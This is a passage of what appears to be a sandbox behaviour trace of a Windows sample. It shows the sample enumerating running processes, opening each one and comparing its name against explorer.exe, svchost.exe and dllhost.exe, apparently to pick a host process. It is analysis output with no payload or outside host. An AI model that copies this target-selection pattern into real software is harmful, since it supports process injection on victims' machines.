(hObject=0xec) returned 1 [0184.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0184.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0184.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0184.540] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0184.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0184.540] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.540] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.540] CloseHandle (hObject=0xec) returned 1 [0184.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0184.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0184.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0184.540] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0184.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0184.541] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.541] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.541] CloseHandle (hObject=0xec) returned 1 [0184.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0184.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0184.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0184.541] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0184.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0184.542] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.542] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.542] CloseHandle (hObject=0xec) returned 1 [0184.542] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0184.542] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0184.542] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0184.542] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0184.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0184.543] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.543] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.543] CloseHandle (hObject=0xec) returned 1 [0184.543] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0184.543] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0184.543] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0184.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0184.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0184.543] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.543] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.543] CloseHandle (hObject=0xec) returned 1 [0184.543] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0184.543] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0184.543] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0184.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0184.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0184.544] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.544] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.544] CloseHandle (hObject=0xec) returned 1 [0184.544] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0184.544] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0184.544] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0184.544] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0184.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0184.545] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.545] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.545] CloseHandle (hObject=0xec) returned 1 [0184.545] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0184.545] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0184.545] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0184.545] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0184.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0184.545] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.545] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.545] CloseHandle (hObject=0xec) returned 1 [0184.545] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0184.545] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0184.545] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0184.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0184.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0184.546] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.546] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.546] CloseHandle (hObject=0xec) returned 1 [0184.546] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0184.546] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0184.546] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0184.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0184.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0184.547] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.547] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.547] CloseHandle (hObject=0xec) returned 1 [0184.547] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0184.547] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0184.547] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0184.547] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0184.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0184.547] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.547] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.547] CloseHandle (hObject=0xec) returned 1 [0184.547] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0184.547] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0184.548] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0184.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0184.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0184.548] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.548] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.548] CloseHandle (hObject=0xec) returned 1 [0184.548] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0184.548] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0184.548] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0184.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0184.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0184.549] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.549] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.549] CloseHandle (hObject=0xec) returned 1 [0184.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0184.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0184.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0184.549] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0184.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0184.549] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.549] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.549] CloseHandle (hObject=0xec) returned 1 [0184.549] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0184.550] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0184.550] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0184.550] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0184.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0184.550] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.550] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.550] CloseHandle (hObject=0xec) returned 1 [0184.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0184.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0184.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0184.550] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0184.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0184.551] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.551] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.551] CloseHandle (hObject=0xec) returned 1 [0184.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0184.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0184.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0184.551] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0184.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0184.551] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.551] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.551] CloseHandle (hObject=0xec) returned 1 [0184.552] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0184.552] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0184.552] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0184.552] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0184.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0184.552] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.552] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.552] CloseHandle (hObject=0xec) returned 1 [0184.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0184.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0184.552] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0184.552] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0184.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0184.553] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.553] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.553] CloseHandle (hObject=0xec) returned 1 [0184.553] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0184.553] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0184.553] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0184.553] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0184.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0184.553] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.553] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.553] CloseHandle (hObject=0xec) returned 1 [0184.554] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0184.554] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0184.554] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0184.554] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0184.554] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0184.555] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0184.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0184.555] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0184.556] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0184.556] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0184.557] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0184.557] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.557] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.557] CloseHandle (hObject=0xec) returned 1 [0184.557] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0184.558] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.558] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.558] CloseHandle (hObject=0xec) returned 1 [0184.558] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0184.558] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0184.559] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.559] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.559] CloseHandle (hObject=0xec) returned 1 [0184.559] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0184.559] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0184.559] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.559] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.560] CloseHandle (hObject=0xec) returned 1 [0184.560] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.560] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0184.560] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.561] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.561] CloseHandle (hObject=0xec) returned 1 [0184.561] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0184.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0184.561] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.561] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0184.561] CloseHandle (hObject=0xec) returned 1 [0184.561] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0184.561] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0184.561] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0184.561] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: 